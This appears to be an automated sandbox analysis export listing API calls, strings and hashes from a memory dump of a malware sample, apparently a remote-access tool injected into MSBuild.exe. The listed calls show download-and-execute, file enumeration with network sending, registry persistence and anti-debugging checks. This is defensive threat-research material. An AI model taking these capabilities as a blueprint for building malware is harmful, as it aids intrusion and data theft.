• FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: Find$File$CloseFirstH_prologNext
• String ID:
• API String ID: 1157919129-0
• Opcode ID: 5c71d79f2f9360812dedac7527d442aa8a7fb5ca3202f1a004df0d4d64f616ad
• Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
• Opcode Fuzzy Hash: 5c71d79f2f9360812dedac7527d442aa8a7fb5ca3202f1a004df0d4d64f616ad
• Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99

APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
• WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
• WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
• _free.LIBCMT ref: 00448067
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
• _free.LIBCMT ref: 00448233
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 1286116820-0
• Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
• Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
• Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
• Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58

APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: DownloadExecuteFileShell
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$open
• API String ID: 2825088817-2582742282
• Opcode ID: 1f4e035516294d1c63e64c8052a33b962d446aa93914cefb710f3af829e08434
• Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
• Opcode Fuzzy Hash: 1f4e035516294d1c63e64c8052a33b962d446aa93914cefb710f3af829e08434
• Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B

APIs
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
• FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: FileFind$FirstNextsend
• String ID: x@G$x@G
• API String ID: 4113138495-3390264752
• Opcode ID: 19bc1d597298d40ad5cd834a7765643e1cdc608ef6365144587b8eec9382b911
• Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
• Opcode Fuzzy Hash: 19bc1d597298d40ad5cd834a7765643e1cdc608ef6365144587b8eec9382b911
• Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B

APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
  • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
  • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
• Opcode ID: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
• Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
• Opcode Fuzzy Hash: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
• Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF

APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
• _wcschr.LIBVCRUNTIME ref: 00450BF1
• _wcschr.LIBVCRUNTIME ref: 00450BFF
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
• String ID:
• API String ID: 4212172061-0
• Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
• Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
• Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
• Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768

APIs
• __EH_prolog.LIBCMT ref: 00408DAC
• FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
• FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: FileFind$FirstH_prologNext
• String ID:
• API String ID: 301083792-0
• Opcode ID: a2238446b186cea55353008a029da67e2f215ab24b44d608ebe4072823657bfc
• Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
• Opcode Fuzzy Hash: a2238446b186cea55353008a029da67e2f215ab24b44d608ebe4072823657bfc
• Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98

APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: ErrorInfoLastLocale$_free$_abort
• String ID:
• API String ID: 2829624132-0
• Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
• Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
• Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
• Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58

APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A755
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A75F
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A76C
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
• Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
• Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
• Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 00442575
                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044257C
                                                                                                                        • ExitProcess.KERNEL32 ref: 0044258E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1703294689-0
                                                                                                                        • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                        • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                                                                        • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                        • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: .
                                                                                                                        • API String ID: 0-248832578
                                                                                                                        • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                        • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                                                                                        • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                        • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                        • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                        • String ID: <D
                                                                                                                        • API String ID: 1084509184-3866323178
                                                                                                                        • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                                        • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                                                                                        • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                                        • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                        • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                        • String ID: <D
                                                                                                                        • API String ID: 1084509184-3866323178
                                                                                                                        • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                                        • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                                                                        • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                                        • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID: GetLocaleInfoEx
                                                                                                                        • API String ID: 2299586839-2904428671
                                                                                                                        • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                        • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                                                        • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                        • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                                                                                        • Instruction ID: cffdc6bb8eb20f5336ace8b102e865ec7dcfb2cf624fb46ac032ba80a60d6a90
                                                                                                                        • Opcode Fuzzy Hash: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                                                                                        • Instruction Fuzzy Hash: 8A024C71E002199BEF14CFA9C9806AEBBF1FF88314F25826AD919E7350D735AD45CB84
                                                                                                                        APIs
                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520CD,?,?,00000008,?,?,00455412,00000000), ref: 004522FF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionRaise
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3997070919-0
                                                                                                                        • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                                                        • Instruction ID: 47108b7899804ebb5d40a9255b8f0d240b678f8396b787326aeb691ef157153f
                                                                                                                        • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                                                        • Instruction Fuzzy Hash: C0B18F351106089FD715CF28C586B567BE0FF06325F29869AEC99CF3A2C379E986CB44
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 0-4108050209
                                                                                                                        • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                                                        • Instruction ID: f72c02501a8b687524d4eed2bba9748ce27a8789a4669d3223b659a6f876a8a8
                                                                                                                        • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                                                        • Instruction Fuzzy Hash: 8002B3727083004BD714DF39D95272EF3E2AFCC758F15492EF499AB391DA78A8058A4A
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1663032902-0
                                                                                                                        • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                        • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                                                                        • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                        • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2692324296-0
                                                                                                                        • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                                        • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                                                        • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                                        • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-00471558,?,0044225B,00000000,0046DAC0,0000000C,00442216,0000000A,?,?,00448739,0000000A,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                                                                        • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1272433827-0
                                                                                                                        • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                                        • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                                                                        • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                                        • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                        • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1084509184-0
                                                                                                                        • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                                        • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                                                                        • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                                        • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                                        • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                                                                        • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: BG3i@
                                                                                                                        • API String ID: 0-2407888476
                                                                                                                        • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                                                        • Instruction ID: a817909710d0090f483bb13cdd1d1ee80d6dfae79024daed79820ace932836b2
                                                                                                                        • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                                                        • Instruction Fuzzy Hash: E361777160070966DA385A2858D6BBF6396EB0DB04F10391BE943FF3C1D61DAD43874E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
